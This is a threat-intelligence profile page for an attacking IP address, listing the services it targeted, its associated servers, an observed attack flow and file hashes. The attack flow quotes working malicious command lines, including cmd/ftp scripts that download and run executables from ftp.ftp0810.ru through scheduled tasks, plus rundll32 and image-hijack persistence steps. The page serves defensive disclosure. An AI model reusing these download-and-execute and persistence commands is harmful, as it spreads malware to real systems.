Akamai Guardicore Segmentation CTI

Threat Information

Role	Attacker, Scanner
Services Targeted	MSSQL SMB
Tags	Service Start Service Creation Service Configuration DNS Poisoning HTTP SMB Null Session Login Download and Execute WMI Persistence SMB File Operation By CMD Access Suspicious Domain Outgoing Connection Persistency - Image Hijack Scheduled Task Creation Download File Cookie Hijacking IDS - A Network Trojan was detected CMD System File Modification
Associated Attack Servers	103.145.106.242 107.148.13.151 155.94.228.223 185.47.128.124

Basic Information

IP Address	195.142.112.244
Domain	-
ISP	Turkcell Superonline
Country	Turkey
WHOIS	Created Date	-
	Updated Date	-
	Organization	-

First seen in Akamai Guardicore Segmentation	2018-12-23
Last seen in Akamai Guardicore Segmentation	2022-11-25

What is Akamai Guardicore Segmentation
Akamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

IDS detected A Network Trojan was detected : ETERNALBLUE Probe Vulnerable System Response MS17-010	IDS - A Network Trojan was detected
c:\windows\system32\services.exe installed and started cmd as a service named kheA under service group None	Service Start Service Creation
Process c:\windows\system32\regsvr32.exe generated outgoing network traffic to: 185.47.128.124:8124 and 217.195.153.116:80	Outgoing Connection
System file c:\windows\temp\conhoy.exe was modified 4 times	System File Modification
Process c:\windows\temp\conhoy.exe generated outgoing network traffic to: 103.124.105.246:80, 104.233.207.172:8172, 137.175.56.104:80 and 155.94.228.223:80	Outgoing Connection
C:\WINDOWS\Temp\wmia.bat was downloaded	Download File
C:\windows\Temp\ntuser.dat was downloaded	Download File
The file C:\WINDOWS\Temp\u.exe was downloaded and executed	Download and Execute
c:\windows\inf\aspnet\lsma12.exe was downloaded	Download File
System file C:\windows\Temp\ntuser.dat was modified 4 times	System File Modification
System file c:\windows\inf\aspnet\lsma12.exe was modified 4 times	System File Modification
Process c:\windows\temp\u.exe generated outgoing network traffic to: 104.37.187.182:80, 104.37.187.182:8888 and 172.83.155.170:80	Outgoing Connection
Process c:\windows\temp\u.exe attempted to access suspicious domains: grantmindline.com	Access Suspicious Domain Outgoing Connection
The file c:\windows\temp\conhoy.exe was downloaded and executed 13 times	Download and Execute
The file C:\WINDOWS\system\msinfo.exe was downloaded and executed	Download and Execute
The file C:\WINDOWS\system32\wpcap.dll was downloaded and loaded by c:\windows\system32\wpcap.dll	Download and Execute
The file C:\WINDOWS\system32\packet.dll was downloaded and loaded by c:\windows\system32\packet.dll	Download and Execute
The command line cmd /c echo open ftp.ftp0810.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa.job
The command line C:\WINDOWS\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa1.job
The command line cmd /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa2.job
The command line cmd /c echo open ftp.ftp0810.ru>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe was scheduled to run by modifying C:\WINDOWS\Tasks\Mysa3.job
The command line C:\WINDOWS\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa was scheduled to run by modifying C:\WINDOWS\Tasks\ok.job
The command line c:\windows\inf\aspnet\lsma12.exe was scheduled to run by modifying C:\WINDOWS\Tasks\oka.job
The command line c:\windows\temp\conhoy.exe was scheduled to run by modifying C:\WINDOWS\Tasks\MicrosoftsWindowsy.job
c:\windows\system32\reg.exe set the command line ntsd -d to run using Persistency - Image Hijack 2 times	Persistency - Image Hijack
c:\windows\system32\net1.exe set the command line ntsd -d to run using Persistency - Image Hijack	Persistency - Image Hijack
DNS poisoning detected, with hostname kr1s.ru , and associated IP address 127.0.0.1
DNS poisoning detected, with hostname zcop.ru , and associated IP address 127.0.0.1
DNS poisoning detected, with hostname sql.4i7i.com , and associated IP address 127.0.0.1
DNS poisoning detected, with hostname kr1s.ru , and associated IP address 127.0.0.1
DNS poisoning detected, with hostname zcop.ru , and associated IP address 127.0.0.1
DNS poisoning detected, with hostname sql.4i7i.com , and associated IP address 127.0.0.1
System file C:\WINDOWS\system32\drivers\etc\hosts was modified	System File Modification
System file C:\WINDOWS\system32\wbem\AutoRecover\88744D2A29102FC88ECF505DD2E984FC.mof was modified	System File Modification
Connection was closed due to user inactivity

Associated Files

C:\WINDOWS\Debug\item.dat	SHA256: 1e8441f0d32d3854e0b3801063f6015a9f09637d77b714f8e58fb8c198693a51	4122624 bytes
C:\WINDOWS\system\msinfo.exe	SHA256: 20c29760791e953c383bcc5a49ceb1c4b96f077c7ad8a6d7d14b030b5804acc5	7277056 bytes
C:\WINDOWS\Temp\conhoy.exe	SHA256: 58064d9b9c44e6d6fe6f20abc74335859fb822f733d1b3e231a9d85aaef8e638	7680 bytes
C:\WINDOWS\system32\packet.dll	SHA256: cd9f4fb077c25013226e0883f9ae02e9ced9b71f07637081e55ae70fd0788f29	102136 bytes

Akamai Security Intelligence Group

Guardicore CENTRA

Cyber Threat Intelligence

Discover malicious IPs and domains with Akamai Guardicore Segmentation

Threat Information

Basic Information

Attack Flow

Associated Files